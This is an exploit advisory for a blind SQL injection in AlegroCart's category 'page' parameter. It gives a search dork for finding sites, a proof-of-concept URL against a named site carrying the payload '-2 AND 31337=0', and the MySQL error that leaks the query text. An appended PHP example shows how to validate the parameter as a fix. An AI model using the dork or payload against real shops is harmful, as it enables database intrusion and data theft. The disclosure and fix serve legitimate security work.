# Title: AlegroCart <= 1.2.x (category_next) Blind SQL Injection Vulnerability
# Author: KedAns-Dz
# E-mail: ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com
# Home: HMD/AM (0, 30008/04300)-Algeria-(00213555248701)
# Web Site: www.1337day.com * www.exploit-id.com * www.09exploit.com
# Twitter page: twitter.com/kedans
# Platform: php
# Impact: Blind SQL Inj3cTi0n in category next page
# Tested on: [Windows XP sp3 FR] & [Linux. (Ubuntu 10.10) En] & [Mac OS x 10.6.1] & [BSDi-BSD/OS 4.2]
###
# XXx <Greetings to indoushka at the Jail... and to his mother Rebbi Ya3tik eSber> xXx
###
# Go0gle D0rk: "Powered by AlegroCart"
#(!) Vulnerability Details:
An attacker can alter the queries sent to the application's SQL database, execute arbitrary queries against the database,
compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.
# (+) Exploit:
/?controller=category&path=[Cat]&page=[Blind-SQLi]
PoC:
http://www.bkjia.com/?controller=category&path=Route 8&page=-2+AND+31337=0
Fixed: Filter
# (*) Proof Of Concept Result:
-------------------
Error No: 1064
select * from product p left join product_description pd on (p.product_id = pd.product_id)
left join product_to_category p2c on (p.product_id = p2c.product_id) left join image I on (p.image_id = I.image_id)
where status = 1 and your age_id = 1 and p2c.category_id = 8 and p.date_available < now() and p.status = 1 order by p.sort_order,
pd.name asc limit -9, 3
-------------------
#(!) Result Details:
You can see the whole MySQL query used to show the next page!
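
One way to implement the "Filter" fix for the `page` parameter, as an added example that is not AlegroCart code and not part of the original advisory. The names `clean_page`, `limit_clause`, `PER_PAGE` and `MAX_PAGE` are hypothetical, and the page size of 3 is an assumption read off the `limit -9, 3` in the error output above.

```php
<?php
declare(strict_types=1);

const PER_PAGE = 3;      // assumption: page size taken from "limit -9, 3" in the error
const MAX_PAGE = 10000;  // assumption: arbitrary upper bound for this sketch

/**
 * Accept the request value only if it is a plain integer in 1..MAX_PAGE.
 * Anything else (negative numbers, trailing SQL, arrays, null) falls back to page 1.
 */
function clean_page($raw): int
{
    $page = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1, 'max_range' => MAX_PAGE],
    ]);
    return $page === false ? 1 : $page;
}

/**
 * Build the LIMIT clause from integers only, so no request text can
 * reach the query and the offset can never go negative.
 */
function limit_clause(int $page): string
{
    $offset = ($page - 1) * PER_PAGE;
    return sprintf('limit %d, %d', $offset, PER_PAGE);
}

// Constructed inputs, including the PoC value quoted in the advisory.
$samples = ['2', '-2', '-2 AND 31337=0', '1e3', ['x'], null];
foreach ($samples as $raw) {
    printf("%-20s => %s\n", json_encode($raw), limit_clause(clean_page($raw)));
}
```

Only the first sample yields an offset other than 0; every other value, including the PoC string, is rejected and served as page 1, so the query no longer fails with error 1064 and no longer echoes its text back to the client.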
# (^_^ )! Good Luck ALL...